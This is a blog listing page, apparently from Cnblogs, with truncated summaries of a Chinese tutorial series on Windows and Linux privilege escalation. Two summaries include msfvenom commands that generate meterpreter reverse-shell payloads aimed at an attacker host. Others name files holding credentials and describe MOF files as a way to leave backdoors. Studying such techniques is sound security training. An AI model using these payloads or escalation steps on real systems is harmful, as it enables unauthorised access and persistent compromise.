会员
周边
捐助
新闻
博问
闪存
赞助商
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
EndlessShw
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
8
9
10
下一页
2021年8月18日
第十七节 msf结合漏洞审计工具进行提权
摘要: 1. Windows补丁审计工具 在终端下可以使用命令systeminfo查看系统的信息(尤其是漏洞补丁信息)。 Windows补丁检测Windows-Exploit-Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggeste
阅读全文
posted @ 2021-08-18 18:32 EndlessShw
阅读(138)
评论(0)
推荐(0)
编辑
2021年8月16日
第十六节 Metasploit Linux提权
摘要: 1. 获得反弹shell 区别于Windows,Linux因为exe不是可执行文件,所以要换其他的方法。 生成反弹shell的php: msfvenom -p php/meterpreter_reverse_tcp LHOST=本地IP LPORT=12345 -f raw > /var/www/h
阅读全文
posted @ 2021-08-16 18:02 EndlessShw
阅读(668)
评论(0)
推荐(0)
编辑
第十五节 meteasploit windows提权
摘要: 1. 常见的提取板块 metasploit提权EXP存储文件夹路径: usr/share/metasploit-framework/modules/exploits/windows/local#windows:windows/local Windows常见的提权模块: ms14_058 内核模式驱动
阅读全文
posted @ 2021-08-16 17:18 EndlessShw
阅读(74)
评论(0)
推荐(0)
编辑
第十四节 FileZilla提权
摘要: 1. 简介 FileZilla是一个ftp服务器,假如配置不严的,就可以读取xml文件内容(包含用户的信息和管理信息)执行一些简单的命令。 默认的安装目录:C:\Program Files\FileZilla Server\ 包含敏感信息的两个文件为:FileZilla Server.xml和Fil
阅读全文
posted @ 2021-08-16 13:06 EndlessShw
阅读(161)
评论(0)
推荐(0)
编辑
2021年8月14日
第十三节 zend反弹shell提权
摘要: 1. 漏洞利用过程 msfconsole生成反弹shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe 在其中一个dos框中进行监听: use
阅读全文
posted @ 2021-08-14 16:58 EndlessShw
阅读(59)
评论(0)
推荐(0)
编辑
2021年8月13日
第十二节 zend提权
摘要: 1. 简介 在php里面有一个扩展是zend,这个是用解析php zend脚本加密文件。 如果服务器安装了zend,如果ZendExtensionManager.dll 权限可以修改,那就可以用其他dll替换这dll文件。即如果php装了Zend插件 就要查看这个目录的ZendExtensionMa
阅读全文
posted @ 2021-08-13 18:36 EndlessShw
阅读(83)
评论(0)
推荐(0)
编辑
第十一节 mof提取(一般用来留后门
摘要: 1. mof 托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Stu
阅读全文
posted @ 2021-08-13 17:57 EndlessShw
阅读(247)
评论(0)
推荐(0)
编辑
第十节 lpk劫持提权
摘要: 1. 简介 lpk劫持发生在Windows2003或者xp中。如果同一个目录中存在exe和lpk.dll。每当exe执行的时候就会被劫持。利用这个特性可以把lpk提权的文件放到权限较高的程序,当exe运行时,lpk.dl就可以进行提权。 2. 提权工具 Tools Lpk Sethc v4 这个工具
阅读全文
posted @ 2021-08-13 14:03 EndlessShw
阅读(371)
评论(0)
推荐(0)
编辑
第九节 winserver2008 r2 溢出提权
摘要: 1. 简介 在winserver2008 r2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具进行提权。 2. CVE-2014-4113-Exploit 利用该提取工具对winserver2008进行溢出提权。 3. 利用过程 通过aspx
阅读全文
posted @ 2021-08-13 12:43 EndlessShw
阅读(328)
评论(0)
推荐(0)
编辑
2021年8月11日
第八节 SQL server提权
摘要: 1. 简介 如果网站里面使用的数据库是SQL server,那么如果找到sa的密码,利用提权脚本来执行命令,但是不一定是系统权限,还要看管理员开始安装SQL server时给予其的权限设置 2. 查找账号和密码 一般会存放账号密码的地方: web.config config.asp conn.asp
阅读全文
posted @ 2021-08-11 18:18 EndlessShw
阅读(151)
评论(0)
推荐(0)
编辑
上一页
1
2
3
4
5
6
7
8
9
10
下一页